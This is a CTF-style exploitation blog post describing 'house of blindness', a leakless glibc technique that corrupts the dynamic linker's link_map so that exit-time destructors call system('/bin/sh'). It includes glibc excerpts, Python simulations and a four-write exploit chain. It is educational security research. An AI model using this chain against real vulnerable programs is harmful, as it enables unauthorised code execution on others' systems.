the solution to google's 7-year problem: popping leakless shells by ripping the runtime dynamic linker open
# issues in exit town
I recently read [this](http://binholic.blogspot.com/2017/05/notes-on-abusing-exit-handlers.html?m=1) post, which discusses and builds on google project zero's research into hacking `exit()`.
It's pretty interesting! The exit function is as ubiquitous as it is hardened. Every program needs to exit, so how libc goes about it matters. Bugs form on complex surfaces, and as more things need to be done at exit (like flushing IO and unloading libraries), more complexity is introduced into exiting.
However, `exit` is fairly hardened. Pointer encryption prevents injecting arbitrary addresses into the exit task chain, and getting around it requires a primitive that's extremely difficult to achieve: arbitrary read. An arbitrary read is needed not only to calculate libc base but also to leak the TLS xor key required for encrypting pointers. A weaker primitive like a libc leak just isn't sufficient the way it usually is.
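To make the pointer encryption concrete, here's a minimal sketch of the mangling as I understand it from glibc's x86-64 `PTR_MANGLE`: xor with the per-thread pointer guard, then rotate left by `0x11`. The guard and address below are made-up values, and other architectures differ in the details.

```python
MASK64 = (1 << 64) - 1
ROTATE_BITS = 0x11  # rotation used on x86-64; treat as an assumption elsewhere


def rol64(value, bits):
    """Rotate a 64-bit value left by `bits`."""
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value, bits):
    """Rotate a 64-bit value right by `bits`."""
    return ((value >> bits) | (value << (64 - bits))) & MASK64


def ptr_mangle(pointer, guard):
    """Encrypt a function pointer before it is stored in the exit chain."""
    return rol64(pointer ^ guard, ROTATE_BITS)


def ptr_demangle(mangled, guard):
    """Undo ptr_mangle; only correct with the right guard."""
    return ror64(mangled, ROTATE_BITS) ^ guard


# Hypothetical values, for illustration only.
guard = 0x1C8F2A9B5D3E7F41
system_addr = 0x7F3A1C24F290

stored = ptr_mangle(system_addr, guard)
recovered = ptr_demangle(stored, guard)
wrong_guess = ptr_demangle(stored, 0)  # attacker who doesn't know the guard
print(hex(stored), hex(recovered), hex(wrong_guess))
```

Knowing where `system` lives isn't enough here: without the guard, whatever we forge demangles to garbage, which is why the existing techniques lean on an arbitrary read.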
As a result, the research done so far by binholic and project zero is, well, not where it could be. Both rely on powerful primitives to write a generalized exploit against exit, which is unfortunate considering how almost every program which uses libc relies on it. Reducing these primitives would yield an extremely powerful exploit strategy, one that could work on any program utilizing libc's exit regardless of the actual contents of the program.
The biggest requirement to overcome is *leaks*. ASLR has been a hacker's worst nightmare, increasing the complexity of exploits several times over. Many smaller exploit chains have two pieces: get a leak, then use the leak to get RCE. libc is designed around forcing hackers to get a leak before they can pwn; just take a look at the recent heap updates in 2.33, which are designed to force a leak before the heap can be exploited, stomping out potential hacks before they can show up.
# house of blindness
House of blindness is a new exploit strategy that proves leaks aren't necessary. Its entire premise stems from studying the question of:
> how on earth does `.fini_array` even work?
It's a question even most good pwners couldn't answer. It's not a particularly hard question, it's just that most people don't care. `.fini_array` is a useful gimmick if you can't overwrite the GOT or need an LSB write on a binary space address, but its usage in CTF often doesn't go beyond a gimmick.
House of blindness isn't a conventional "overwrite `.fini_array` and win" style exploit. Rather, with a few clever partial writes and some interesting properties of the runtime dynamic linker, we can trick the rtld into miscalculating where `.fini` is in memory. The only primitive we need is relative write.
Did I mention we can do this completely leaklessly?
### abusing mmap relativity
Consider the following code:
    // get size from user
    char *chunk = malloc(size);
    // get idx and byte from the user
    chunk[idx] = byte;
Although it may not look like it, this allows us to write a byte in libc's memory, without needing leaks! There are a couple of things at play here that allow us to do that.
- When size is sufficiently large, instead of returning a chunk from the heap, `malloc` "mmaps" a chunk.
- `idx` can be negative or exceed `size`, meaning that we can write anywhere that's a known offset from the chunk.
- Although two regions mapped by `mmap` aren't necessarily contiguous, they sit at constant offsets from each other.
Determining these offsets accurately across machines requires a deeper look into how `mmap` works. I go into more depth about how linkers map segments in memory in [this post](https://wip), but for understanding this exploit, all you need to know is that `mmap` chunks, libc, and ld are all consistently spaced.
Knowing this, relative write is no longer just a stepping stone toward arbitrary write, but a powerful primitive in its own right.
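Here's a small model of why that works. It doesn't prove anything about real `mmap` behaviour; it just assumes the constant spacing described above and shows that the index we need never depends on the randomized base. All gaps and offsets are hypothetical and would have to be measured on the target.

```python
import random

PAGE_SIZE = 0x1000

# Hypothetical distances between mappings (measure these on a real target).
CHUNK_PAGE_TO_LIBC = 0x201000  # start of the mmapped chunk's page -> libc base
LIBC_TO_LD = 0x1F4000          # libc base -> ld.so base
TARGET_IN_LD = 0x2F190         # made-up offset of the byte we want to hit
CHUNK_HEADER = 0x10            # malloc metadata before the user pointer


def randomized_layout(rng):
    """Pick a random page for the chunk; libc and ld follow at fixed gaps."""
    chunk_page = rng.randrange(0x7F0000000000, 0x7FFF00000000, PAGE_SIZE)
    chunk = chunk_page + CHUNK_HEADER
    libc_base = chunk_page + CHUNK_PAGE_TO_LIBC
    ld_base = libc_base + LIBC_TO_LD
    return chunk, libc_base, ld_base


def index_for(chunk, target):
    """Index such that &chunk[idx] == target (it may also be negative)."""
    return target - chunk


rng = random.Random(1337)
indexes = set()
for _ in range(5):
    chunk, libc_base, ld_base = randomized_layout(rng)
    indexes.add(index_for(chunk, ld_base + TARGET_IN_LD))

# Five different "ASLR runs", one index.
print([hex(i) for i in indexes])
```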
### carnage in `_dl_fini`
Our destructor functions, `.fini` and `.fini_array`, are both called in `_dl_fini`, a function in `ld.so`. `_dl_fini` is one of the two functions registered to be called at exit, alongside the equally interesting `_IO_cleanup`, but that's a topic for another day.
Let's take a look at how the destructors are called.
    /* Is there a destructor function?  */
    if (l->l_info[DT_FINI_ARRAY] != NULL
        || l->l_info[DT_FINI] != NULL)
      {
        /* When debugging print a message first.  */
        if (__builtin_expect (GLRO(dl_debug_mask)
                              & DL_DEBUG_IMPCALLS, 0))
          _dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
                            DSO_FILENAME (l->l_name),
                            ns);
        /* First see whether an array is given.  */
        if (l->l_info[DT_FINI_ARRAY] != NULL)
          {
            ElfW(Addr) *array =
              (ElfW(Addr) *) (l->l_addr
                              + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
            unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
                              / sizeof (ElfW(Addr)));
            while (i-- > 0)
              ((fini_t) array[i]) ();
          }
        /* Next try the old-style destructor.  */
        if (l->l_info[DT_FINI] != NULL)
          DL_CALL_DT_FINI
            (l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
      }
There's a bit to unpack here! `l` is a `link_map`, a data structure that stores a whole lot of data about a specific mapped binary, like the executed binary.
A specific part of the link map is `l_info`, where the information collected from the `.dynamic` section of the ELF lives. Here's an example `.dynamic` section I grabbed from an ELF with Binary Ninja.
![.dynamic section example](https://i.imgur.com/e83WuVR.png)
Each entry has two pieces: a tag and a data value. The tag we're interested in is `DT_FINI`.
#### .fini, old type destructor
    /* Next try the old-style destructor.  */
    if (l->l_info[DT_FINI] != NULL)
      DL_CALL_DT_FINI
        (l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
`l->l_addr` is the base of the loaded executable, where you'd see the ELF header in memory. `l->l_info[DT_FINI]` is a little more interesting. The value of the `DT_FINI` tag is *the offset of the `.fini` section from the start of the binary*. So, to figure out where the `fini` function is, the linker has a pointer to the `DT_FINI` entry in `.dynamic`, `l_info[DT_FINI]`. It'll dereference it when it comes time to get the offset.
Once it does, it'll add the offset to the base address and call `fini`.
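As a toy model of that calculation, the sketch below mirrors `l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr` over a fake memory. The load address and the location of the `.dynamic` entry are hypothetical; the 16-byte entry layout (8-byte tag, then 8-byte value) is the standard `Elf64_Dyn`.

```python
import struct

MASK64 = (1 << 64) - 1
DT_FINI = 13  # tag value from the ELF specification


class ToyMemory:
    """Sparse byte-addressable memory, just enough for this model."""

    def __init__(self):
        self.cells = {}

    def write(self, address, data):
        for i, byte in enumerate(data):
            self.cells[address + i] = byte

    def read_u64(self, address):
        raw = bytes(self.cells.get(address + i, 0) for i in range(8))
        return struct.unpack("<Q", raw)[0]


def resolve_fini(memory, l_addr, l_info_fini):
    """Mirror l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr."""
    d_ptr = memory.read_u64(l_info_fini + 8)  # skip d_tag to reach d_un
    return (l_addr + d_ptr) & MASK64


# Hypothetical load address and .dynamic entry location.
l_addr = 0x555555554000
fini_entry = l_addr + 0x3E18

memory = ToyMemory()
memory.write(fini_entry, struct.pack("<QQ", DT_FINI, 0x1298))

fini_address = resolve_fini(memory, l_addr, fini_entry)
print(hex(fini_address))
```

Both inputs to the sum, `l_addr` and the pointer stored in `l_info[DT_FINI]`, live in the link map, which is exactly the memory a relative write can reach.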
How do we exploit this?
#### partial writes on `l_info[DT_FINI]`
Least significant byte writing is a common leakless tactic in pwn. The last 12 bits of any address aren't affected by ASLR, so there's one byte, the least significant byte, which will always be constant. This is because pages are always aligned to 4096-byte boundaries. This isn't any different with our `.fini` offset pointer. What if we did a partial write on the LSB of this pointer, causing the offset to resolve differently? What if, maybe, it resolves to something totally different?
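A quick sketch of why a one-byte partial write is ASLR-proof: only the lowest byte changes, and that byte sits entirely inside the 12 bits ASLR never touches. The offsets are hypothetical, and the trick only reaches targets that share every byte except the lowest with the original pointer.

```python
import random
import struct

PAGE_SIZE = 0x1000


def overwrite_low_byte(pointer, new_byte):
    """Simulate a one-byte write on a little-endian 64-bit pointer."""
    raw = bytearray(struct.pack("<Q", pointer))
    raw[0] = new_byte  # little-endian: byte 0 is the least significant
    return struct.unpack("<Q", bytes(raw))[0]


# Hypothetical in-page offsets; they agree on everything above the low byte.
ORIGINAL_OFFSET = 0xE18
WANTED_OFFSET = 0xEB8

rng = random.Random(7)
landing_offsets = []
for _ in range(3):
    page = rng.randrange(0x550000000000, 0x560000000000, PAGE_SIZE)
    pointer = page + ORIGINAL_OFFSET
    patched = overwrite_low_byte(pointer, WANTED_OFFSET & 0xFF)
    landing_offsets.append(patched - page)
    print(hex(pointer), "->", hex(patched))
```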
### plan of attack
Let's come up with an exploit plan. If we want a libc address in our sum of `l_addr` and `l_info[DT_FINI]`, one of them needs to be a libc address. We know `l_addr` is a binary space address; no amount of LSB writing will change that. However, the existence of a set of writes that'll get `l_info[DT_FINI]` to point to a libc address is a little more open.
If we can get `l_info[DT_FINI]` to resolve to a libc address, we can write some constant into `l_addr` to shift the resulting pointer around in libc, hopefully to `system`.
This would absolutely ruin the link map after our call, but like, who cares?
#### the adjacency of `.got.plt` and `.dynamic`
We can leverage the adjacency of the `.got.plt` and `.dynamic` to get `l_info[DT_FINI]` to point to an entry in the GOT.
Unfortunately, the `.dynamic` section is big. Like, *way* bigger than 256 bytes, meaning just overwriting the LSB isn't enough to take us to the GOT. We'll need to overwrite the *two* least significant bytes, which unfortunately introduces 4 bits of brute-force since we only have 12 bits of consistency. Once we do that, we could set up a pretty cool strategy.
    # move l_info[DT_FINI] from pointing at _fini offset (0x1298) to read in got (0x7f...)
    # change l_addr from binary base (0x5c...) to difference between system and read
    write(ld.main_link_map.l_addr, p64(libc.system - libc.read))
Ignoring how we're going to control `$rdi` to be `/bin/sh` for a second, is there a better way to get a libc address into our calculation without having to guess 4 bits of entropy?
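To put a number on those 4 bits: a two-byte write sets 16 bits, of which only the low 12 are known, so exactly one of the 16 possible values for the remaining nibble lands on the target. The sketch below assumes, hypothetically, that the GOT entry shares its upper 48 bits with the pointer being corrupted.

```python
import random


def overwrite_low_two_bytes(pointer, value16):
    """Replace the two least significant bytes of a 64-bit pointer."""
    return (pointer & ~0xFFFF) | (value16 & 0xFFFF)


# Hypothetical: low 12 bits of the GOT entry, known from the binary itself.
KNOWN_LOW_12_BITS = 0x018

rng = random.Random(2021)
region = rng.randrange(0x550000000000, 0x560000000000, 0x10000)
secret_nibble = rng.randrange(16)  # bits 12..15, decided by ASLR
target = region | (secret_nibble << 12) | KNOWN_LOW_12_BITS
pointer = region | 0x3E18          # made-up current value of the pointer

working_guesses = [
    nibble
    for nibble in range(16)
    if overwrite_low_two_bytes(pointer, (nibble << 12) | KNOWN_LOW_12_BITS)
    == target
]
print(working_guesses, "out of 16 guesses hit the target")
```

One guess in sixteen is workable, but it means the exploit only fires on a fraction of runs, which is what the next section gets rid of.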
#### refining our exploit with `_r_debug`
At first glance, there doesn't seem to be another way to get a libc address into `l_info[DT_FINI]` without a two-byte write!
That's actually true. There is another route, though: the `.dynamic` section has one more trick up its sleeve, the `DT_DEBUG` entry.
When the linker loads the binary, it provides debuggers with a reference to `_r_debug`, a structure that contains information on the binary's link map.
A pointer to this structure is put inside the `.dynamic` section for easy access! How convenient. Can we use `_r_debug` as a drop-in replacement for a libc address?
Yes, actually! Even though `_r_debug` isn't in libc, it's in ld, so it's *mmap relative*. Hopefully, we can write some value into `l_addr` that shifts the result from `_r_debug` to `system`.
Isn't `ld.so` mapped after `libc.so` though? We can overwrite `l_addr` to some big number `n` so that `.fini` resolves to `_r_debug+n`, but what good is that if `system` is behind `_r_debug`?
Luckily, we have some tools in our toolbelt as pwners to fix this.
#### integer overflows
This isn't a particularly hard bug to force. If we set `l_addr` to `0xffffffffffffffff`, the sum resolves to `_r_debug-1`: the addition carries into a 9th byte, but that carry gets thrown out because our registers aren't wide enough to hold anything larger than 8 bytes.
I go deeper into this behaviour in [this post](https://blog.pepsipu.com/posts/mujs-uiuctf). For our purposes though, packing our offsets as negative fixes this issue pretty neatly!
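Here's the wraparound worked through with made-up addresses (`ld.so` above libc, as discussed). `struct.pack("<q", ...)` stands in for a signed 64-bit pack; the two's complement bytes it produces, read back as an unsigned `l_addr`, land the sum exactly on `system`.

```python
import struct

MASK64 = (1 << 64) - 1

# Hypothetical addresses, with _r_debug (in ld.so) above system (in libc).
R_DEBUG = 0x7F3A1C4A2118
SYSTEM = 0x7F3A1C24F290


def resolve(l_addr, d_ptr):
    """64-bit addition as the CPU performs it: the carry out is dropped."""
    return (l_addr + d_ptr) & MASK64


# 0xffffffffffffffff behaves like -1.
minus_one = resolve(0xFFFFFFFFFFFFFFFF, R_DEBUG)

# A negative delta packed as signed becomes a huge unsigned l_addr.
delta = SYSTEM - R_DEBUG
packed = struct.pack("<q", delta)
l_addr = struct.unpack("<Q", packed)[0]
resolved = resolve(l_addr, R_DEBUG)

print(hex(minus_one), hex(l_addr), hex(resolved))
```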
#### cleaning up
One caveat. Clobbering the link map, specifically `l_addr`, breaks a lot of stuff, mostly after our call. However, `l_addr` is also used to locate `.fini_array`, which runs before `.fini`, so we'll need to null out `l_info[DT_FINI_ARRAY]` to keep it from being called.
Another caveat. Even with an arbitrary call in libc, using one-gadgets can get messy, especially when writing an exploit that should work across all libcs. It's often a lot neater if we can control what `$rdi` points to so we can just call `system` with `/bin/sh`.
Luckily, our destructors are called right after we unlock `dl_load_lock`. The source code details more about this process, but the point is we call `__rtld_lock_unlock_recursive` on a lock in `ld.so` memory. `$rdi` will be a pointer in `ld.so`!
Let's just write `/bin/sh` to our lock. Although there are several issues with writing random data to a mutex that would cause any self-respecting concurrency engineer to go off on you, for our purposes no one actually asked.
### the exploit
    # disable fini array from exec
    write(ld.address + link_map + l_info + 8 * DT_FINI_ARRAY, p64(0))
    # overwrite l_info[DT_FINI]'s lsb so that it points at the DT_DEBUG entry, which holds &_r_debug
    write(ld.address + link_map + l_info + 8 * DT_FINI, b"\xb8")
    # overwrite l_addr with offset to bring _r_debug to system
    write(
        ld.address + link_map,
        p64(libc.symbols["system"] - ld.symbols["_r_debug"], signed=True),
    )
    # fill _dl_load_lock with /bin/sh
    write(ld.symbols["_rtld_global"] + _dl_load_lock, b"/bin/sh\x00")
Although this exploit looks like total gibberish without the long and extensive build up associated with it, I think it's very worth it! General exploits are just as useful as they are cool.
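If it helps, here's the whole chain replayed against a toy memory instead of a real process. Every address and struct offset below is hypothetical, and `toy_dl_fini` models only the destructor logic quoted earlier, plus the assumption that `$rdi` still points at the load lock when `.fini` is called.

```python
import struct

MASK64 = (1 << 64) - 1
DT_FINI, DT_DEBUG, DT_FINI_ARRAY = 13, 21, 26  # ELF dynamic tag values

# Hypothetical addresses and offsets, for illustration only.
EXE_BASE = 0x555555554000
SYSTEM = 0x7F3A1C24F290
R_DEBUG = 0x7F3A1C4A2118
LOAD_LOCK = 0x7F3A1C4A2968
LINK_MAP = 0x7F3A1C4A3190
L_INFO = 0x40
FINI_DYN = EXE_BASE + 0x3E18        # Elf64_Dyn entry for DT_FINI
FINI_ARRAY_DYN = EXE_BASE + 0x3E38  # Elf64_Dyn entry for DT_FINI_ARRAY
DEBUG_DYN = EXE_BASE + 0x3EB8       # Elf64_Dyn entry for DT_DEBUG

memory = {}


def write(address, data):
    for i, byte in enumerate(data):
        memory[address + i] = byte


def read(address, size):
    return bytes(memory.get(address + i, 0) for i in range(size))


def read_u64(address):
    return struct.unpack("<Q", read(address, 8))[0]


def info_slot(tag):
    return LINK_MAP + L_INFO + 8 * tag


def toy_dl_fini():
    """Return (call target, bytes at rdi) for the old-style destructor."""
    rdi = LOAD_LOCK  # assumption: left over from unlocking dl_load_lock
    if read_u64(info_slot(DT_FINI_ARRAY)) != 0:
        raise RuntimeError("fini_array would run through the clobbered l_addr")
    dyn = read_u64(info_slot(DT_FINI))
    target = (read_u64(LINK_MAP) + read_u64(dyn + 8)) & MASK64
    return target, read(rdi, 8)


# State as the loader would leave it.
write(LINK_MAP, struct.pack("<Q", EXE_BASE))
write(FINI_DYN, struct.pack("<QQ", DT_FINI, 0x1298))
write(FINI_ARRAY_DYN, struct.pack("<QQ", DT_FINI_ARRAY, 0x3DE8))
write(DEBUG_DYN, struct.pack("<QQ", DT_DEBUG, R_DEBUG))
write(info_slot(DT_FINI), struct.pack("<Q", FINI_DYN))
write(info_slot(DT_FINI_ARRAY), struct.pack("<Q", FINI_ARRAY_DYN))

# The four writes from the exploit.
write(info_slot(DT_FINI_ARRAY), struct.pack("<Q", 0))
write(info_slot(DT_FINI), b"\xb8")
write(LINK_MAP, struct.pack("<q", SYSTEM - R_DEBUG))
write(LOAD_LOCK, b"/bin/sh\x00")

target, argument = toy_dl_fini()
print(hex(target), argument)
```

None of the four writes needs a randomized value: two are constants, one is a single low byte, and one is a difference between two mmap-relative symbols.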
### the future
There's still lots of improvement to be made and much room for flexibility. Relative write isn't actually necessary; weaker primitives would work too!
Consider `global_max_fast` overwrites, which allow us to write a heap pointer anywhere relative to the main arena. A similar exploit could be made by forging offsets on the heap and making `l_info[DT_FINI]` reference them.
Relative byte write isn't necessary either! Unaligned 8-byte writes are more than enough to pull off the exploit, since we only need to overwrite one LSB.
Exiting is not a super big issue either! Forcing an exit by corrupting heap state and triggering heap activity is pretty trivial.
There's a *whole* lot more that we can use such an exploit for. That's what's so great about general exploits: they have a ton of flexibility!